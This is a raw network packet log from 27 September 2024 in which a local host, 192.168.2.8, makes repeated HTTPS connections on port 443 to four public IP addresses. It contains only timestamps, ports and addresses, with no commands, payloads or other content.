Sep 27, 2024 18:18:54.039452076 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.040474892 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.040532112 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.041717052 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.041774988 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.041903973 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.041908979 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.042042971 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.087405920 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.095339060 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.253525019 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.253674984 CEST	443	49730	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:54.253726006 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.254338980 CEST	49730	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:54.257251978 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:54.257307053 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:54.257370949 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:54.625466108 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:54.625497103 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:55.274462938 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:55.275110960 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:55.275135994 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:55.276226997 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:55.276285887 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:55.278183937 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:55.278332949 CEST	443	49731	45.112.123.126	192.168.2.8
Sep 27, 2024 18:18:55.278381109 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:55.278431892 CEST	49731	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:18:55.279942989 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.279997110 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.280077934 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.280513048 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.280539036 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.735994101 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.736632109 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.736660004 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.737725973 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.737795115 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.738972902 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.739048958 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.739079952 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.779416084 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.784082890 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.784106016 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.829785109 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.871861935 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.871948004 CEST	443	49732	172.67.74.152	192.168.2.8
Sep 27, 2024 18:18:55.872083902 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.885682106 CEST	49732	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:18:55.886621952 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:55.886679888 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:55.886863947 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:55.887296915 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:55.887314081 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.698611021 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.699043036 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.699059963 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.700138092 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.700206041 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.701364994 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.701425076 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.701488018 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.743398905 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.751610994 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.751630068 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.798479080 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.894256115 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.894340038 CEST	443	49733	159.89.102.253	192.168.2.8
Sep 27, 2024 18:18:56.894387007 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.895132065 CEST	49733	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:18:56.896346092 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:56.896392107 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:56.896450043 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:56.896924973 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:56.896936893 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.357314110 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.357800007 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.357825041 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.358880043 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.358942986 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.360186100 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.360260010 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.360382080 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.360383034 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.360392094 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.403399944 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.405174971 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.580203056 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.580323935 CEST	443	49734	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.580363989 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.581003904 CEST	49734	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.582079887 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.582154989 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:57.582230091 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.582564116 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:57.582576990 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.057337046 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.058111906 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.058129072 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.059200048 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.059257030 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.060616016 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.060683966 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.060770035 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.060781956 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.060801983 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.103405952 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.110975981 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.310230017 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.310338974 CEST	443	49735	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.310524940 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.311024904 CEST	49735	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.312081099 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.312125921 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.312206030 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.312558889 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.312571049 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.785140038 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.788784981 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.788804054 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.789923906 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.789995909 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.791196108 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.791274071 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.791367054 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.791374922 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.791419029 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.839399099 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.976650000 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.976777077 CEST	443	49736	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.976865053 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.978574991 CEST	49736	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.979635954 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.979669094 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:58.979743004 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.980223894 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:58.980232954 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.462867975 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.463321924 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.463352919 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.464438915 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.464515924 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.465914011 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.465989113 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.466048956 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.466058969 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.466078043 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.507414103 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.517235041 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.816456079 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.816580057 CEST	443	49737	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.816658020 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.817317963 CEST	49737	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.818270922 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.818299055 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:18:59.818378925 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.818777084 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:18:59.818789959 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.269974947 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.270452023 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.270481110 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.271559000 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.271625996 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.274034977 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.274117947 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.274249077 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.274259090 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.274390936 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.319401979 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.462728024 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.463077068 CEST	443	49738	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.463144064 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.463769913 CEST	49738	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.465281010 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.465320110 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.465503931 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.465754986 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.465771914 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.930468082 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.932338953 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.932354927 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.933454990 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.933516026 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.934845924 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.934845924 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.934916973 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.935182095 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.975403070 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:00.985997915 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:00.986011982 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.032874107 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.169356108 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.169491053 CEST	443	49740	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.169533014 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.170253038 CEST	49740	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.171076059 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.171107054 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.171243906 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.171560049 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.171571016 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.628684998 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.656374931 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.656392097 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.657635927 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.657700062 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.749460936 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.749617100 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.749728918 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.749752998 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.749833107 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.795403004 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.916160107 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.916338921 CEST	443	49741	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.916404963 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.917174101 CEST	49741	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.918210983 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.918253899 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:01.918329954 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.918680906 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:01.918695927 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.317420959 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.317465067 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.317533016 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.318617105 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.318639994 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.333535910 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:02.333627939 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:02.333703995 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:02.377821922 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.378261089 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.378314018 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.379462004 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.379530907 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.381025076 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.381140947 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.381171942 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.381217957 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.381226063 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.423531055 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.637048006 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.637207985 CEST	443	49742	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:02.637265921 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.638268948 CEST	49742	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:02.783607006 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.784966946 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.784991026 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.786122084 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.786391020 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.787949085 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.787949085 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.788038969 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.837075949 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.837102890 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.892695904 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.915566921 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.915636063 CEST	443	49743	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:02.915818930 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.916518927 CEST	49743	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:02.917563915 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:02.917601109 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:02.920824051 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:02.922257900 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:02.922266006 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.022505999 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.022562981 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.022681952 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.023253918 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.023282051 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.500885010 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.501347065 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.501368999 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.502437115 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.502522945 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.505645990 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.505723953 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.505861044 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.549046040 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.549077034 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.596215010 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.596215963 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:03.596260071 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:03.658396959 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.658468962 CEST	443	49746	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:03.659640074 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.659640074 CEST	49746	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:03.660797119 CEST	49747	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.660841942 CEST	443	49747	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.661000013 CEST	49747	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.661453962 CEST	49747	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.661472082 CEST	443	49747	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.745408058 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.755021095 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.755042076 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.756248951 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.756320000 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.758378983 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.758447886 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.758632898 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.758641005 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.799216986 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.950098991 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.950193882 CEST	443	49745	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:03.950246096 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.950946093 CEST	49745	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:03.952409029 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:03.952464104 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:03.952518940 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:03.952893019 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:03.952907085 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.283091068 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:04.290846109 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:04.290900946 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:04.292046070 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:04.292114019 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:04.439426899 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.492882967 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:04.493174076 CEST	443	49744	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:04.493232012 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:04.496901989 CEST	49744	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:04.509249926 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:04.509263992 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.509676933 CEST	49749	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:04.509692907 CEST	443	49749	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:04.509753942 CEST	49749	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:04.510492086 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.510504961 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.510540962 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:04.510880947 CEST	49749	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:04.510889053 CEST	443	49749	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:04.512689114 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:04.512758970 CEST	443	49748	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:04.513062000 CEST	49748	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:04.513071060 CEST	443	49748	162.159.136.232	192.168.2.8
